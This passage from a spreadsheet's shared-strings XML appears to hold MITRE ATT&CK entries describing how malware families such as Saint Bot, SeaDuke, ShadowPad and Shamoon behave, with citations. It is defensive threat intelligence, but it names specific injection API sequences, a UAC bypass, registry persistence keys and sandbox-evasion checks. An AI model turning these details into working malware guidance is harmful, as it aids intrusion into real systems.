    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) used Windows API functions such as &lt;code&gt;MoveFileEx&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess&lt;/code&gt; as part of the [SUNBURST](https://attack.mitre.org/software/S0559) injection process.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for [SUNBURST](https://attack.mitre.org/software/S0559) source code and data extracted from the SolarWinds Orion &lt;MsBuild.exe&lt;/code&gt; process.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) monitored running processes for instances of &lt;code&gt;MsBuild.exe&lt;/code&gt; by hashing the name of each running process and comparing it to the corresponding value &lt;code&gt;0x53D525&lt;/code&gt;. It also extracted command-line arguments and individual arguments from the running &lt;code&gt;MsBuild.exe&lt;/code&gt; process to identify the directory path of the Orion software Visual Studio solution.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) created a copy of the SolarWinds Orion software source file with a &lt;code&gt;.bk&lt;/code&gt; extension to backup the original content, wrote [SUNBURST](https://attack.mitre.org/software/S0559) using the same filename but with a &lt;code&gt;.tmp&lt;/code&gt; extension, and then moved [SUNBURST](https://attack.mitre.org/software/S0559) using &lt;code&gt;MoveFileEx&lt;/code&gt; to the original filename with a &lt;code&gt;.cs&lt;/code&gt; extension so it could be compiled within Orion software.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).(Citation: Carnegie Mellon University Supernova Dec 2020)(Citation: Splunk Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) has masqueraded as a legitimate SolarWinds DLL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) contained Base64-encoded strings.(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is a Web shell.(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect files and information from a compromised host.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `is_debugger_present` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can deobfuscate strings and files for execution.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has injected its DLL component into `EhStorAurhn.exe`.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can run a batch script named `del.bat` to remove any [Saint Bot](https://attack.mitre.org/software/S1018) payload-linked files from a compromise system if anti-analysis or locale checks fail.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can search a compromised host for specific files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can download additional files onto a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) had used `InstallUtil.exe` to download and deploy executables.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has relied upon users to execute a malicious attachment delivered via spearphishing.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has relied on users to click on a malicious link delivered via a spearphishing.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been disguised as a legitimate executable, including as Windows SDK.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been obfuscated to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used PowerShell for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>The [Saint Bot](https://attack.mitre.org/software/S1018) loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted [Saint Bot](https://attack.mitre.org/software/S1018) binary into it.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `check_registry_keys` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has established persistence by being copied to the Startup directory or through the `\Software\Microsoft\Windows\CurrentVersion\Run` registry key.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `regsvr32` to execute scripts.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has created a scheduled task named "Maintenance" to establish persistence.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been packed using a dark market crypter.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed as malicious attachments within spearphishing emails.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used Base64 to encode its C2 communications.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has run several virtual machine and sandbox checks, including checking if `Sbiedll.dll` is present in a list of loaded modules, comparing the machine name to `HAL9TH` and the user name to `JohnDoe`, and checking the BIOS version for known virtual machine identifiers.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can identify the OS version, CPU, and other details from a victim's machine.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect the IP address of a victim machine.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect the username from a compromised host.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used the command `timeout 20` to pause the execution of its initial loader.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `.vbs` scripts for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used HTTP for C2 communications.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `cmd.exe` and `.bat` scripts for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) contains UAC bypass code for both 32- and 64-bit systems.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples use cmd.exe to delete temporary files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) has the capability to download files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses single-byte XOR obfuscation to obfuscate many of its files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Most [Sakula](https://attack.mitre.org/software/S0074) samples maintain persistence by setting the Registry Run key &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; in the HKLM or HKCU hive, with the Registry value and file name varying by sample.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) encodes C2 traffic with single-byte XOR keys.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses HTTP for C2.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. [Sakula](https://attack.mitre.org/software/S0074) also has the capability to invoke a reverse shell.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has used garbage code to pad some of its malware components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen deleting its own files and payloads to make analysis of the attack more difficult.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen using AES or DES to encrypt payloads and payload components.(Citation: Sophos SamSam Apr 2018)(Citation: Talos SamSam Jan 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) uses custom batch scripts to execute some of its components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) compressed data with zlib prior to sending it over C2.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) can securely delete files, including deleting itself from the victim.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of uploading and downloading files.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to use pass the ticket with Kerberos for authentication.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses a module to execute Mimikatz with PowerShell to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) has been packed with the UPX packer.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic is base64-encoded.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic has been encrypted with RC4 and AES.(Citation: Mandiant No Easy Breach)(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of executing commands.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to delete a specified file.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has the capability to identify the drive type on a victim.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to download additional files.(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has masqueraded as a service called "SaSaut" with a display name of "System Authorization Service" in an apparent attempt to masquerade as a legitimate service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) obfuscates configuration data.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to perform a process listing.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) creates a Registry entry to ensure infection after reboot under &lt;code&gt;HKLM\Software\Microsoft\Windows\currentVersion\Run&lt;/code&gt;.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses cmd.exe to create a reverse shell on the infected endpoint.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is capable of installing itself as a service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has a module to delete itself from the infected machine.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may download additional files to execute.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has created a new user and added it to the "Remote Desktop Users" and "Administrators" groups.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may attempt to establish persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; run key.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains a module for downloading and executing DLLs that leverages &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains modules that will use [schtasks](https://attack.mitre.org/software/S0111) to carry out malicious operations.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate Windows version and system architecture.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate the username of the victim.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) can execute shell commands against [cmd](https://attack.mitre.org/software/S0106).(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) can encrypt files on a targeted system, appending them with the suffix .seth.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) has the ability to download and execute files on a compromised host.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) can execute commands via the command line shell.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used DNS tunneling for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has decrypted a binary blob to start execution.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) uses a DGA that is based on the day of the month for C2 servers.(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected a DLL into svchost.exe.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used FTP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has deleted arbitrary Registry values.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has downloaded code from a C2 server.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) maintains a configuration block and virtual file system in the Registry.(Citation: Kaspersky ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used UDP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encoded data as readable Latin characters.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encrypted its payload, a virtual file system, and various files.(Citation: Securelist ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the PID of a malicious process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected an install module into a newly created process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has sent data back to C2 every 8 hours.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the domain name of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the username of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the current date and time of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to disable UAC remote restrictions by modifying the Registry.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has an operational mode for encrypting data instead of overwriting it.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)	</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has been seen overwriting features of disk structure such as the MBR.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can download an executable to run on the victim.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to copy itself to remote machines on the network.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the "MaintenaceSrv" service, which misspells the word "maintenance."(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) contains base64-encoded strings.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) queries several Registry keys to identify hard disk partitions to overwrite.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) scans the C-class subnet of the IPs on the victim's interfaces.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) to execute the malware.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) copies an executable payload to the target system by using [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) and then scheduling an unnamed task to execute the malware.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
